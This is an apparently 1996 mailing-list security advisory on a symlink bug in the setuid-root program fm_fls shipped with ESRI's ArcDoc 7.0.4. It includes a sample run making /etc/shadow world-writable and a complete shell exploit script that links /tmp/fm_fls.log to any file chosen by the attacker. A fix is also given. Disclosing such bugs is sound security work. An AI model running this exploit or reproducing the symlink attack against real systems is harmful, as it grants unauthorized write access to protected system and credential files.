Security problem in ESRI's ArcDoc 7.0.4

[jwa () nbs nau edu (James W. Abendschan)]

*** GIS & ESRI/ARC/Info shops take note! ***

The program "fm_fls" as distributed with ESRI's "ArcDoc" package (7.0.4)
contains a bug which allows us to (a) add somewhat arbitrary data
to any file and (b) changes the permissions of that file to rw-rw-rw-.

fm_fls is setuid root.

When fm_fls is executed, it opens up a logfile -- the default location
for this file is /tmp/fm_fls.log.  Unfortunately, it doesn't
check if this file already exists or if this file has any symlinks
attached to it.  If for some reason fm_fls gets bad arguments, it
will write these bad arguments to the logfile, chown the file to
root, give the file 666 permissions, and exit.

If we make a link from this file to an unreadable file, we
can both append the contents of the logfile into the unreadable
file and gain world rw access to the file.

Sample run:

> ecosys:~jwa/Security/Projects/r00tin> id
> uid=200(jwa) gid=107(cpin)
> ecosys:~jwa/Security/Projects/r00tin> ls -l /etc/shadow
> -rw-------   1 root     other       1851 May 23 20:22 /etc/shadow
> ecosys:~jwa/Security/Projects/r00tin> fm.sploit /etc/shadow
> /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error.  Unable to open License File woot
> fm.sploit of /etc/shadow yields:
> -rw-rw-rw-   1 root     other       2011 May 23 20:38 /etc/shadow
> ecosys:~jwa/Security/Projects/r00tin> tail -5 /etc/shadow
> mpm:xxxxxxxxxxxxx:6445::::::
> ebp:xxxxxxxxxxxxx:6445::::::
> sml:xxxxxxxxxxxxx:6445::::::
> 1996/05/23-20:38:32 BG woot ecosys
> # 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls: Error.  Unable to open License 
> File woot
> ecosys:~jwa/Security/Projects/r00tin>

Note the additional lines appended to the target file (in this case,
/etc/shadow.)

To fix this, either (a) yell at your vendor or (b) chmod 555 `which fm_fls`.
I don't yet know the effects of removing the suid bit on fm_fls; I'd
like to hear feedback on this.  I've seen fm_fls distributed with
other applications -- perhaps the bug is not specific to ARC/Info?

Comments are welcome.

James


#!/bin/sh
#
# exploit a bug in the fm_fls application as distributed with ARC/Info's
# ArcDoc (and others?) to give us rw access to any file.
#
# fix: chmod 555 `which fm_fls`
#
# tested on Solaris 2.5 w/ ArcDoc 7.0.4
#
# James Abendschan  jwa () nbs nau edu  23 May 1996
#

# full path to the fm_fls executable

FM_FLS="/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls"

LOGFILE=/tmp/fm_fls.log
TMP=/tmp/exploit.$$
UNREADABLE=$1


if [ $# != 1 ]
then
 echo "usage: `basename $0` filename"
 exit 1
fi

rm -f $LOGFILE

if [ -f $LOGFILE ]
then
 echo "tried to remove $LOGFILE, but it still exists!  Exploit won't work."
 exit 1
fi

# since fm_fls will complain if we link to a logfile too "far away"
# from the original file, we just do a dual link..

ln -s $UNREADABLE $TMP
ln -s $TMP $LOGFILE

$FM_FLS woot

echo "`basename $0` of $UNREADABLE yields:"

ls -l $UNREADABLE

# all done, clean up.

rm -f $TMP $LOGFILE
exit 0


--
James W. Abendschan                                 Email: jwa () nbs nau edu
UNIX Systems Programmer/Administrator               Phone: (520) 556-7466 x238
Colorado Plateau Research Station, Flagstaff, AZ    Voice mail: *516